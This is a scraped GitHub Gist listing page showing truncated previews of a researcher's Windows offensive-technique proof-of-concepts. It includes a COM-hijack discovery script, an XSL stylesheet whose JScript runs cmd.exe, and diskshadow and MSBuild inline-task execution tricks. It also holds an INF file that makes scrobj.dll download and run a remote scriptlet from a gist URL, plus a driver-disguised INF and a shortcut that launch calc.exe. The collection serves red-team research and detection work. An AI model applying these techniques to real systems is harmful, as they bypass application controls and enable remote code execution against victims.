bohops
/ Abandoned_COM_PowerShell.txt
Created
November 4, 2018 22:18
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - Abandoned COM Discovery Script. | |
| - Makes a few assumptions, needs refinement (e.g. doesn't account for all extensions) | |
| function GetMissing($server){$clsids=@{};cd $env:windir'\system32\';$srv=gwmi Win32_COMSetting | ?{$_.$server -ne $null};$srv | ForEach {$clsids.add($_.ComponentId,$_.$server)};$clsids.Keys | foreach {$p=[Environment]::ExpandEnvironmentVariables($clsids[$_]);$p=$p.Replace('"','');if($p.Contains('.exe ')){$p=$p.Substring(0,$p.IndexOf('.exe'))+'.exe'};if($(test-path $p) -eq $False){$_+' | '+$server+' | '+$p}}};GetMissing('LocalServer');GetMissing('LocalServer32');GetMissing('InprocServer');GetMissing('InprocServer32') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <stylesheet | |
| xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
| xmlns:user="placeholder" | |
| version="1.0"> | |
| <output method="text"/> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); | |
| ]]> </ms:script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} |
bohops
/ PowerShell TCP_Interval.txt
Created
October 17, 2018 16:42
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| while ($true) { | |
| $(Get-Date).ToUniversalTime() | |
| $Runspace = [runspacefactory]::CreateRunspace() | |
| $PowerShell = [powershell]::Create() | |
| $PowerShell.runspace = $Runspace | |
| $Runspace.Open() | |
| [void]$PowerShell.AddScript({ | |
| $tcpConnection = New-Object System.Net.Sockets.TcpClient('1.1.1.1', 80) | |
| $tcpStream = $tcpConnection.GetStream() |
bohops
/ ProgIDs.txt
Last active
September 26, 2022 23:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| file | |
| StaticMetafile | |
| StaticDib | |
| clsid | |
| objref | |
| ADODB.Command.6.0 | |
| ADODB.Parameter.6.0 | |
| ADODB.Connection.6.0 | |
| ADODB.Recordset.6.0 | |
| ADODB.Error.6.0 |
bohops
/ diskshadow.txt
Created
May 21, 2018 02:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Execute | |
| ======= | |
| *Interactive Mode | |
| cmd.exe | |
| c:\windows\system32\diskshadow.exe | |
| > exec calc.exe | |
| > exec "cmd.exe" /c calc.exe | |
| > exit |
bohops
/ ieuinit.inf
Created
May 20, 2018 21:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [version] | |
| signature="$CHICAGO$" | |
| AdvancedINF=2.0 | |
| [DefaultInstall.Windows7] | |
| UnRegisterOCXs=FunRun | |
| [FunRun] | |
| %11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct |
bohops
/ JankyAF.csproj
Last active
April 28, 2022 21:44
Fun loader for Casey Smith's (@subTee) JanyAF.xsl
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > |
bohops
/ calc_exe.inf
Created
May 19, 2018 15:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; DRIVER.INF | |
| ; Copyright (c) Microsoft Corporation. All rights reserved. | |
| [Version] | |
| Signature = "$CHICAGO$" | |
| Class=61883 | |
| ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} | |
| Provider=%Msft% | |
| DriverVer=06/21/2006,6.1.7600.16385 | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [InternetShortcut] | |
| URL=file:///c:\windows\system32\calc.exe |